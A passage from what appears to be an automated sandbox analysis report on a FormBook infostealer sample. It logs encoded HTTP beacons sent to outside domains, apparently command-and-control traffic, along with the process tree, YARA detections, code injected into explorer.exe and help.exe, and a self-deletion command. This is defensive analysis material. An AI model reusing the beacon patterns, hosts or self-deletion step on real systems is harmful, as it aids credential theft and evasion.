                                                                                                          Jun 11, 2021 08:55:32.021022081 CEST6684OUTGET /bp3i/?o6tTHHhh=G/6vsm0KxG9qmRdgnTa4hWK9fX8ri3vqlPmeKNZjc+yTORxazFkMTyGVd6qzkwgGx7fuosCohA==&3fuD_=S2MtYLGX0vFd HTTP/1.1
                                                                                                          Host: www.xn---yado-8e4dze0c.site
                                                                                                          Connection: close
                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                          Data Ascii:
                                                                                                          Jun 11, 2021 08:55:32.328037977 CEST6684INHTTP/1.1 302 Found
                                                                                                          Date: Fri, 11 Jun 2021 06:55:32 GMT
                                                                                                          Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                                                                          Location: http://dfltweb1.onamae.com
                                                                                                          Content-Length: 210
                                                                                                          Connection: close
                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 64 66 6c 74 77 65 62 31 2e 6f 6e 61 6d 61 65 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://dfltweb1.onamae.com">here</a>.</p></body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          5192.168.2.649754184.168.131.24180C:\Windows\explorer.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Jun 11, 2021 08:55:37.621895075 CEST6685OUTGET /bp3i/?3fuD_=S2MtYLGX0vFd&o6tTHHhh=+tA82deiMnBv5x6tQvXabF4qHjy6FJLdLGXe/FevxPH8etKnEP6uMBOxOd785YA8v1+XbYT2uw== HTTP/1.1
                                                                                                          Host: www.oceancollaborative.com
                                                                                                          Connection: close
                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                          Data Ascii:
                                                                                                          Jun 11, 2021 08:55:37.868011951 CEST6686INHTTP/1.1 302 Found
                                                                                                          Server: nginx/1.16.1
                                                                                                          Date: Fri, 11 Jun 2021 06:55:37 GMT
                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Location: https://afternic.com/forsale/oceancollaborative.com?utm_source=TDFS&utm_medium=sn_affiliate_click&utm_campaign=TDFS_GoDaddy_DLS&traffic_type=TDFS&traffic_id=GoDaddy_DLS
                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Code Manipulations

                                                                                                          Statistics

                                                                                                          Behavior

                                                                                                          Click to jump to process

                                                                                                          System Behavior

                                                                                                          Analysis Process: 5t2CmTUhKc.exe PID: 6368 Parent PID: 5932

                                                                                                          General

                                                                                                          Start time:08:53:36
                                                                                                          Start date:11/06/2021
                                                                                                          Path:C:\Users\user\Desktop\5t2CmTUhKc.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:'C:\Users\user\Desktop\5t2CmTUhKc.exe'
                                                                                                          Imagebase:0x400000
                                                                                                          File size:225177 bytes
                                                                                                          MD5 hash:116E736BA00FCA4B8499C4DF00796454
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.342749345.0000000002290000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.342749345.0000000002290000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.342749345.0000000002290000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          Reputation:low

                                                                                                          Analysis Process: 5t2CmTUhKc.exe PID: 6432 Parent PID: 6368

                                                                                                          General

                                                                                                          Start time:08:53:37
                                                                                                          Start date:11/06/2021
                                                                                                          Path:C:\Users\user\Desktop\5t2CmTUhKc.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:'C:\Users\user\Desktop\5t2CmTUhKc.exe'
                                                                                                          Imagebase:0x400000
                                                                                                          File size:225177 bytes
                                                                                                          MD5 hash:116E736BA00FCA4B8499C4DF00796454
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.416256071.0000000000870000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.416256071.0000000000870000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.416256071.0000000000870000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.416309209.00000000009F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.416309209.00000000009F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.416309209.00000000009F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.415990324.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.415990324.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.415990324.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000001.338823641.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000001.338823641.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000001.338823641.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          Reputation:low

                                                                                                          Analysis Process: explorer.exe PID: 3440 Parent PID: 6432

                                                                                                          General

                                                                                                          Start time:08:53:42
                                                                                                          Start date:11/06/2021
                                                                                                          Path:C:\Windows\explorer.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:
                                                                                                          Imagebase:0x7ff6f22f0000
                                                                                                          File size:3933184 bytes
                                                                                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          Analysis Process: help.exe PID: 7136 Parent PID: 6432

                                                                                                          General

                                                                                                          Start time:08:54:15
                                                                                                          Start date:11/06/2021
                                                                                                          Path:C:\Windows\SysWOW64\help.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Windows\SysWOW64\help.exe
                                                                                                          Imagebase:0x13b0000
                                                                                                          File size:10240 bytes
                                                                                                          MD5 hash:09A715036F14D3632AD03B52D1DA6BFF
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.597396860.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.597396860.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.597396860.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.597782419.0000000000750000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.597782419.0000000000750000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.597782419.0000000000750000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.597893599.0000000000780000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.597893599.0000000000780000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.597893599.0000000000780000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          Reputation:moderate

                                                                                                          Analysis Process: cmd.exe PID: 5696 Parent PID: 7136

                                                                                                          General

                                                                                                          Start time:08:54:17
                                                                                                          Start date:11/06/2021
                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:/c del 'C:\Users\user\Desktop\5t2CmTUhKc.exe'
                                                                                                          Imagebase:0x2a0000
                                                                                                          File size:232960 bytes
                                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          Analysis Process: conhost.exe PID: 5688 Parent PID: 5696

                                                                                                          General

                                                                                                          Start time:08:54:17
                                                                                                          Start date:11/06/2021
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff61de10000
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          Disassembly

                                                                                                          Code Analysis

                                                                                                          Reset < >